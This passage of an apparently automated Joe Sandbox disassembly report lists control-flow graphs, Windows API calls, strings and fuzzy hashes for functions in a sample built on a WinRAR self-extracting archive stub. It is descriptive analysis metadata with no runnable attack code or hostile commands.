MapViewOfFile call 41c000 181->188 189 40f79a-40f7a5 call 410951 181->189 210 40f820-40f82e WaitForInputIdle 182->210 211 40f84f 182->211 191 40f6a6-40f6b0 call 408b9d 185->191 192 40f697-40f6a0 GetLastError 185->192 188->182 189->188 191->123 192->191 200 40f6a2 192->200 200->191 205->206 230 40f996-40f99e call 4060a3 206->230 231 40f978-40f97e 206->231 215 40f830-40f835 210->215 217 40f853-40f856 211->217 218 40f845-40f84d 215->218 219 40f837-40f843 Sleep 215->219 221 40f858-40f864 UnmapViewOfFile CloseHandle 217->221 222 40f86a-40f86d 217->222 218->217 219->215 219->218 221->222 222->28 222->149 230->38 231->230 232 40f980-40f986 231->232 232->230 234 40f988-40f991 call 40e700 232->234 234->230
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$z(D
                                                                                  • API String ID: 3519838083-1299667913
                                                                                  • Opcode ID: 4136df6a6fdd2908081ecb667f8b38cd016a064ae2cbabecf8b175fe67b05172
                                                                                  • Instruction ID: 2de117cf305f029db3da918c16ce27e436648ede792bd40733fb280a025eb681
                                                                                  • Opcode Fuzzy Hash: 4136df6a6fdd2908081ecb667f8b38cd016a064ae2cbabecf8b175fe67b05172
                                                                                  • Instruction Fuzzy Hash: 6722F471540244BFEB31BFA19D85E9E3A68AB02304F40417BFA05B21E1D77D4969CB6E
                                                                                  Function 0040E700 Relevance: 73.9, APIs: 35, Strings: 7, Instructions: 411windowfileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 237 40e700-40e718 call 41a250 call 41a860 242 40f2dd-40f2e8 237->242 243 40e71e-40e744 call 40d631 237->243 243->242 246 40e74a-40e74d 243->246 247 40e752-40e76c 246->247 248 40e773-40e786 call 40db68 247->248 251 40e788 248->251 252 40e78c-40e7a4 call 411bd1 251->252 255 40e7b4-40e7b8 252->255 256 40e7a6-40e7ad 252->256 258 40f2ae-40f2d4 call 40d631 255->258 259 40e7be-40e7c1 255->259 256->252 257 40e7af 256->257 257->258 258->247 270 40f2da-40f2dc 258->270 261 40ea70-40ea74 259->261 262 40ea51-40ea55 259->262 263 40e7c8-40e7cc 259->263 264 40e9af-40e9b3 259->264 261->258 267 40ea7a-40ea82 261->267 262->258 265 40ea5b-40ea6b SetWindowTextW 262->265 263->258 268 40e7d2-40e83c call 419a10 call 40a03a call 409353 call 40937c call 40676b call 40952e 263->268 264->258 269 40e9b9-40e9c8 264->269 265->258 267->258 271 40ea88-40eaa2 267->271 336 40e842 268->336 337 40e99b-40e9aa call 409369 268->337 273 40e9d7-40e9db 269->273 274 40e9ca-40e9d6 call 41a53d 269->274 270->242 277 40eaa4-40eaaa 271->277 278 40eaad-40eab6 call 41a523 271->278 275 40e9e5-40e9ed call 40d7dd 273->275 276 40e9dd-40e9e3 273->276 274->273 281 40e9ef-40e9f3 275->281 276->281 277->278 278->258 293 40eabc-40eac3 278->293 287 40e9f5-40e9f7 281->287 288 40e9f9-40ea05 call 41a523 281->288 291 40ea07-40ea2b call 41a523 call 41a308 287->291 288->291 322 40ea32-40ea3f call 41a53d 291->322 323 40ea2d-40ea2f 291->323 298 40eac5-40eaca 293->298 299 40eadf-40eae3 293->299 298->299 300 40eacc-40ead3 298->300 302 40ebc4 299->302 303 40eae9-40eaec 299->303 300->258 305 40ead9-40eada 300->305 309 40ebc5-40ebcc call 41a56b 302->309 307 40eaf9-40eb13 RegOpenKeyExW 303->307 308 40eaee-40eaf3 303->308 305->309 312 40eb15-40eb4f RegQueryValueExW RegCloseKey 307->312 313 40eb5e-40eb66 307->313 308->302 308->307 321 40ebd1-40ebd2 309->321 317 40eb51 312->317 318 40eb54-40eb56 312->318 319 40eb93-40ebb1 call 41a523 * 2 313->319 320 40eb68-40eb7e call 41a523 313->320 317->318 318->313 328 40ebd3-40ebe5 call 41c7ff 319->328 350 40ebb3-40ebc2 call 41a53d 319->350 320->319 338 40eb80-40eb92 call 41a53d 320->338 321->328 322->258 334 40ea45-40ea4c call 41a27a 322->334 323->322 345 40ebf3-40ec41 call 41a56b call 40d9c6 GetDlgItem SetWindowTextW SendMessageW call 41a791 328->345 346 40ebe7-40ebec 328->346 334->258 342 40e847-40e85d SetFileAttributesW 336->342 337->258 338->319 351 40e863-40e897 call 40a6ec call 40a00a call 41a523 342->351 352 40e905-40e911 GetFileAttributesW 342->352 373 40ec46-40ec4a 345->373 346->345 347 40ebee-40ebf0 346->347 347->345 350->321 379 40e899-40e8a9 call 41a523 351->379 380 40e8ab-40e8b9 call 409fc4 351->380 358 40e913-40e922 DeleteFileW 352->358 359 40e97f-40e995 call 40952e 352->359 358->359 364 40e924-40e928 358->364 359->337 359->342 368 40e930-40e954 call 401b74 GetFileAttributesW 364->368 375 40e956-40e96c MoveFileW 368->375 376 40e92a-40e92d 368->376 373->258 377 40ec50-40ec65 SendMessageW 373->377 375->359 381 40e96e-40e979 MoveFileExW 375->381 376->368 377->258 379->380 386 40e8bf-40e8ff call 41a523 call 41a590 SHFileOperationW 379->386 380->337 380->386 381->359 386->352
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040E705
                                                                                    • Part of subcall function 0040D631: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0040D6DF
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,00000800,?,00000000,75C05540,?,0040F3EA,?,00000003), ref: 0040E850
                                                                                  • _wcslen.LIBCMT ref: 0040E88B
                                                                                  • _wcslen.LIBCMT ref: 0040E8A0
                                                                                  • _wcslen.LIBCMT ref: 0040E8C6
                                                                                  • _memset.LIBCMT ref: 0040E8DC
                                                                                  • SHFileOperationW.SHELL32 ref: 0040E8FF
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0040E90C
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040E91A
                                                                                  • _wcscat.LIBCMT ref: 0040E9D0
                                                                                  • _wcslen.LIBCMT ref: 0040EA08
                                                                                  • _realloc.LIBCMT ref: 0040EA1A
                                                                                  • _wcscat.LIBCMT ref: 0040EA34
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040EA65
                                                                                  • _wcslen.LIBCMT ref: 0040EAAE
                                                                                  • _wcscpy.LIBCMT ref: 0040EBCC
                                                                                  • _wcsrchr.LIBCMT ref: 0040EBDC
                                                                                  • _wcscpy.LIBCMT ref: 0040EBFB
                                                                                  • GetDlgItem.USER32(?,00000066), ref: 0040EC14
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0040EC24
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,%s.%d.tmp), ref: 0040EC33
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0040EC5F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$File$AttributesMessageSendTextWindow_wcscat_wcscpy$DeleteEnvironmentExpandH_prologItemOperationStrings_memset_realloc_wcsrchr
                                                                                  • String ID: "$%s.%d.tmp$<br>$C:\Users\user\AppData\Local\Temp$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$\
                                                                                  • API String ID: 3339014310-1943431393
                                                                                  • Opcode ID: a312bfa86ed5c22f0a26de5229e35c58a4d19bbac0fd92d548106ffd5423603c
                                                                                  • Instruction ID: e3878ae73ee75937aca8c0adb5b40f7b6819d108fae1ee0c947c7289b3b33f64
                                                                                  • Opcode Fuzzy Hash: a312bfa86ed5c22f0a26de5229e35c58a4d19bbac0fd92d548106ffd5423603c
                                                                                  • Instruction Fuzzy Hash: 62F15FB1904219ABDF20DBA1DC45FEE7378BF04314F4408BBF605B21D1EB789A998B59
                                                                                  Function 0041D67C Relevance: 22.6, APIs: 15, Instructions: 86COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 453 41d67c-41d68b 454 41d6b4 453->454 455 41d68d-41d699 453->455 456 41d6b7-41d6c3 call 41eba7 454->456 455->454 457 41d69b-41d6a2 455->457 461 41d6c5-41d6cc call 41d624 456->461 462 41d6cd-41d6d4 call 41e8ad 456->462 457->454 458 41d6a4-41d6b2 457->458 458->456 461->462 467 41d6d6-41d6dd call 41d624 462->467 468 41d6de-41d6ed call 423b09 call 4238b5 462->468 467->468 475 41d6f7-41d713 GetCommandLineA call 42377e call 4236c3 468->475 476 41d6ef-41d6f6 call 421245 468->476 483 41d715-41d71c call 421245 475->483 484 41d71d-41d724 call 42344b 475->484 476->475 483->484 489 41d726-41d72d call 421245 484->489 490 41d72e-41d737 call 421304 484->490 489->490 495 41d740-41d748 call 4233ec 490->495 496 41d739-41d73f call 421245 490->496 501 41d750-41d752 495->501 502 41d74a-41d74e 495->502 496->495 503 41d753-41d766 call 40fcfb 501->503 502->503 506 41d768-41d769 call 4214b5 503->506 507 41d76e-41d7ca call 4214e1 call 41f891 503->507 506->507
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp__wincmdln
                                                                                  • String ID:
                                                                                  • API String ID: 3545360858-0
                                                                                  • Opcode ID: a55bb9f3dfa655b7c8a7d3ad90ba15450eb4b47b4cad154de41e312a3148be5c
                                                                                  • Instruction ID: 585dd34c56a54c5d764deeccdbd77e89776c7e0983f8679d63152811ed296333
                                                                                  • Opcode Fuzzy Hash: a55bb9f3dfa655b7c8a7d3ad90ba15450eb4b47b4cad154de41e312a3148be5c
                                                                                  • Instruction Fuzzy Hash: 9E21E7B0E0032499EB147F73B846BBD22B8AF1070CF50046FF459AA1D2EB7C99C0865D
                                                                                  Function 0040BAE4 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 240COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 515 40bae4-40bb0f call 41a250 call 41a860 call 41c7d9 522 40bb11-40bb31 GetModuleFileNameW call 41c7ff 515->522 523 40bb3a-40bb6c call 41a56b call 4086a6 call 4086e3 515->523 528 40bdc0-40bdcc 522->528 529 40bb37 522->529 534 40bb82-40bb8c 523->534 535 40bb6e-40bb7d call 408b9d 523->535 529->523 536 40bb8d-40bb91 534->536 543 40bdbf 535->543 538 40bb97-40bbb7 call 408ace call 408d9b 536->538 539 40bcae-40bcd5 call 408f0d call 41ccee 536->539 549 40bbbc-40bbc6 538->549 550 40bdb5-40bdbe call 408b9d 539->550 551 40bcdb-40bce1 call 408d9b 539->551 543->528 552 40bc7a-40bc9e call 408f0d 549->552 553 40bbcc-40bbd6 549->553 550->543 559 40bce6-40bced 551->559 552->536 571 40bca4-40bca8 552->571 556 40bbd8-40bbe0 553->556 557 40bbfd-40bc01 553->557 556->557 561 40bbe2-40bbfb call 41cdb8 556->561 562 40bc03-40bc0f 557->562 563 40bc2f-40bc32 557->563 567 40bcf6-40bd05 call 41ccee 559->567 568 40bcef-40bcf4 559->568 561->557 583 40bc72-40bc77 561->583 562->563 570 40bc11-40bc19 562->570 565 40bc34-40bc3c 563->565 566 40bc5d-40bc66 563->566 565->566 572 40bc3e-40bc57 call 41cdb8 565->572 566->553 573 40bc6c 566->573 578 40bdaf 567->578 589 40bd0b-40bd29 call 4118ad call 41a27a 567->589 574 40bd2b-40bd35 568->574 570->563 577 40bc1b-40bc2d call 41c5cc 570->577 571->539 571->578 572->566 572->578 573->552 579 40bd37 574->579 580 40bd39-40bd46 574->580 577->563 590 40bc6e 577->590 578->550 579->580 586 40bda4-40bdac 580->586 587 40bd48-40bd52 580->587 583->552 586->578 587->586 591 40bd54-40bd58 587->591 589->574 590->583 593 40bd5a-40bd61 591->593 594 40bd8b-40bd8f 591->594 598 40bd63-40bd66 593->598 599 40bd86 593->599 596 40bd91-40bd95 594->596 597 40bd97 594->597 596->597 601 40bd9a-40bda2 596->601 602 40bd99 597->602 603 40bd82-40bd84 598->603 604 40bd68-40bd6b 598->604 605 40bd88-40bd89 599->605 601->586 601->587 602->601 603->605 607 40bd6d-40bd70 604->607 608 40bd7e-40bd80 604->608 605->602 609 40bd72-40bd74 607->609 610 40bd7a-40bd7c 607->610 608->605 609->601 611 40bd76-40bd78 609->611 610->605 611->605
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040BAE9
                                                                                  • _wcschr.LIBCMT ref: 0040BB00
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,004325BC,0040C266,0040FE11,00438820,0040FE11,00438820), ref: 0040BB19
                                                                                  • _wcsrchr.LIBCMT ref: 0040BB28
                                                                                  • _wcscpy.LIBCMT ref: 0040BB3E
                                                                                  • _malloc.LIBCMT ref: 0040BCC5
                                                                                    • Part of subcall function 00408ACE: SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 00408B01
                                                                                    • Part of subcall function 00408ACE: GetLastError.KERNEL32(?,?), ref: 00408B0E
                                                                                  • _strncmp.LIBCMT ref: 0040BBF1
                                                                                  • _strncmp.LIBCMT ref: 0040BC4D
                                                                                  • _malloc.LIBCMT ref: 0040BCFB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: File_malloc_strncmp$ErrorH_prologLastModuleNamePointer_wcschr_wcscpy_wcsrchr
                                                                                  • String ID: *messages***$*messages***$a
                                                                                  • API String ID: 644328012-1639468518
                                                                                  • Opcode ID: 10317417a4586eca6946355d169243879a170e5a8fd4d52b0636de9141d84393
                                                                                  • Instruction ID: fae4271b5ca5faa12ece0e2ec7287f41438ce36a16ccd444264b88eb91a75a81
                                                                                  • Opcode Fuzzy Hash: 10317417a4586eca6946355d169243879a170e5a8fd4d52b0636de9141d84393
                                                                                  • Instruction Fuzzy Hash: BE81D171A002059BDB24AF64CC85BEAB7B4EF10354F10457FE695B72D1DB789A80CA8D
                                                                                  Function 0040C00E Relevance: 21.2, APIs: 14, Instructions: 205COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 612 40c00e-40c06b call 40bf27 GetWindowRect GetClientRect 615 40c071-40c075 612->615 616 40c10a-40c113 612->616 617 40c07b-40c0ba 615->617 618 40c14e 615->618 619 40c153-40c172 GetSystemMetrics GetWindow 616->619 620 40c115-40c14c GetWindowTextW call 40bdcf SetWindowTextW 616->620 622 40c0bc 617->622 623 40c0be-40c0c0 617->623 618->619 621 40c24b-40c24d 619->621 620->619 627 40c253-40c257 621->627 628 40c177-40c17e 621->628 622->623 625 40c0c2 623->625 626 40c0c4-40c0db GetWindowLongW 623->626 625->626 631 40c0e4-40c107 SetWindowPos GetWindowRect 626->631 632 40c0dd 626->632 628->627 630 40c184-40c19d GetWindowTextW 628->630 633 40c1c5-40c1c9 630->633 634 40c19f-40c1bf call 40bdcf SetWindowTextW 630->634 631->616 632->631 636 40c235-40c246 GetWindow 633->636 637 40c1cb-40c22f GetWindowRect SetWindowPos 633->637 634->633 636->627 639 40c248 636->639 637->636 639->621
                                                                                  APIs
                                                                                    • Part of subcall function 0040BF27: _wcschr.LIBCMT ref: 0040BF57
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040C037
                                                                                  • GetClientRect.USER32(?,?), ref: 0040C044
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040C0D0
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040C0F4
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040C101
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0040C120
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040C146
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 0040C155
                                                                                  • GetWindow.USER32(?,00000005), ref: 0040C162
                                                                                  • GetWindowTextW.USER32(00000000,?,00000400), ref: 0040C18F
                                                                                  • SetWindowTextW.USER32(00000000,00000000), ref: 0040C1BF
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0040C1D2
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000110,00000000,00000110,00000204), ref: 0040C22F
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0040C23A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                  • String ID:
                                                                                  • API String ID: 4134264131-0
                                                                                  • Opcode ID: 08dc7c77311b924382860ca2428d645387aaf5d18714a7fe9270ec02dbb33203
                                                                                  • Instruction ID: 83760e71496a0374b0b2c3c7462e578a832f05ba5207c20b6528c65cc0e3b382
                                                                                  • Opcode Fuzzy Hash: 08dc7c77311b924382860ca2428d645387aaf5d18714a7fe9270ec02dbb33203
                                                                                  • Instruction Fuzzy Hash: 37712971A00219EFDF10DFE8DC89AEEBBB9FF08310F048129F915A61A0D7749A55CB94
                                                                                  Function 0040D148 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94windowCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(00000068,00000000), ref: 0040D159
                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040D296,00000001,?,?,0040E176,0042A830,0044BF30,0044BF30,00001000), ref: 0040D186
                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0040D192
                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,0042A724), ref: 0040D1A1
                                                                                  • SendMessageW.USER32(004012F5,000000B1,05F5E100,05F5E100), ref: 0040D1B5
                                                                                  • SendMessageW.USER32(004012F5,0000043A,00000000,?), ref: 0040D1CC
                                                                                  • SendMessageW.USER32(004012F5,00000444,00000001,0000005C), ref: 0040D207
                                                                                  • SendMessageW.USER32(004012F5,000000C2,00000000,00000456), ref: 0040D216
                                                                                  • SendMessageW.USER32(004012F5,000000B1,05F5E100,05F5E100), ref: 0040D21E
                                                                                  • SendMessageW.USER32(004012F5,00000444,00000001,0000005C), ref: 0040D242
                                                                                  • SendMessageW.USER32(004012F5,000000C2,00000000,0042A7F8), ref: 0040D253
                                                                                    • Part of subcall function 00418F00: DestroyWindow.USER32(?,75C05540,0040D183,?,?,?,?,?,0040D296,00000001,?,?,0040E176,0042A830,0044BF30,0044BF30), ref: 00418F0B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$DestroyItemShow
                                                                                  • String ID: \
                                                                                  • API String ID: 2996232536-2967466578
                                                                                  • Opcode ID: 1ad0790bab26b30c8b81776c8fd295548d614ad83e21288c0110c87a32675c13
                                                                                  • Instruction ID: b73a047212543c466c214dc37ee7a3e93f324aea90a0f7c159de315576d9ffd8
                                                                                  • Opcode Fuzzy Hash: 1ad0790bab26b30c8b81776c8fd295548d614ad83e21288c0110c87a32675c13
                                                                                  • Instruction Fuzzy Hash: C131D470E4025CBEEB219B90CC4AFAE7FB9EB81714F204129F604BA1D0C7B55D10DB59
                                                                                  Function 0040E315 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 174windowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 649 40e315-40e32b call 41a860 652 40e530-40e533 649->652 653 40e331-40e33d call 41a523 649->653 653->652 656 40e343-40e366 call 41a590 653->656 659 40e370 656->659 660 40e368-40e36e 656->660 661 40e373-40e378 659->661 660->661 662 40e3c9-40e3ce 661->662 663 40e37a 661->663 664 40e3d0-40e3d3 662->664 665 40e3d5-40e3d8 662->665 666 40e37c-40e380 663->666 664->665 667 40e3ea-40e3fe call 40a42f 664->667 665->667 668 40e3da-40e3e1 665->668 669 40e382 666->669 670 40e39b-40e3a0 666->670 684 40e400-40e40d call 411bd1 667->684 685 40e416-40e420 call 4091c5 667->685 668->667 671 40e3e3 668->671 672 40e38b-40e390 669->672 674 40e3a2-40e3a8 670->674 675 40e3b5-40e3bc 670->675 671->667 679 40e392 672->679 680 40e384-40e389 672->680 674->675 676 40e3aa-40e3b1 674->676 677 40e3c3-40e3c6 675->677 678 40e3be-40e3c0 675->678 676->666 682 40e3b3 676->682 677->662 678->677 679->670 680->672 683 40e394-40e397 680->683 682->662 683->670 684->685 690 40e40f 684->690 691 40e422-40e43c call 40a928 685->691 692 40e43f-40e44b ShellExecuteExW 685->692 690->685 691->692 694 40e451-40e465 692->694 695 40e52f 692->695 697 40e474-40e477 694->697 698 40e467-40e46a 694->698 695->652 700 40e490-40e4ac WaitForInputIdle call 40d707 697->700 701 40e479-40e484 IsWindowVisible 697->701 698->697 699 40e46c-40e472 698->699 699->697 702 40e4d1-40e4dd CloseHandle 699->702 700->702 708 40e4ae-40e4bd GetExitCodeProcess 700->708 701->700 703 40e486-40e48c ShowWindow 701->703 706 40e4f0-40e4f6 702->706 707 40e4df-40e4ee call 411bd1 702->707 703->700 710 40e4f8-40e4fb 706->710 711 40e509-40e519 706->711 707->706 715 40e51e-40e521 707->715 708->702 712 40e4bf-40e4ca 708->712 710->711 714 40e4fd-40e507 710->714 711->715 712->702 716 40e4cc 712->716 714->715 715->695 717 40e523-40e526 715->717 716->702 717->695 718 40e528-40e52d ShowWindow 717->718 718->695
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0040E332
                                                                                  • _memset.LIBCMT ref: 0040E34D
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0040E443
                                                                                  • IsWindowVisible.USER32(?), ref: 0040E47C
                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040E48A
                                                                                  • WaitForInputIdle.USER32(?,000007D0), ref: 0040E498
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0040E4B5
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E4D4
                                                                                  • ShowWindow.USER32(?,00000001), ref: 0040E52D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_memset_wcslen
                                                                                  • String ID: .exe$.inf
                                                                                  • API String ID: 3215649069-3750412487
                                                                                  • Opcode ID: c43d5cea43acb8451b998e593abe7df8778e72f0008cb859fe992623c606565e
                                                                                  • Instruction ID: 3ccf00b328ba57d64acbb030228f5c5aef6956b37b3d39e4c31579fdc7cdee16
                                                                                  • Opcode Fuzzy Hash: c43d5cea43acb8451b998e593abe7df8778e72f0008cb859fe992623c606565e
                                                                                  • Instruction Fuzzy Hash: 59519371904358BADF21ABA2DC405AE7FB4AF00304F048C7BE941B72E1E77999A5CB49
                                                                                  Function 00419DD5 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 30librarycomCOMMON
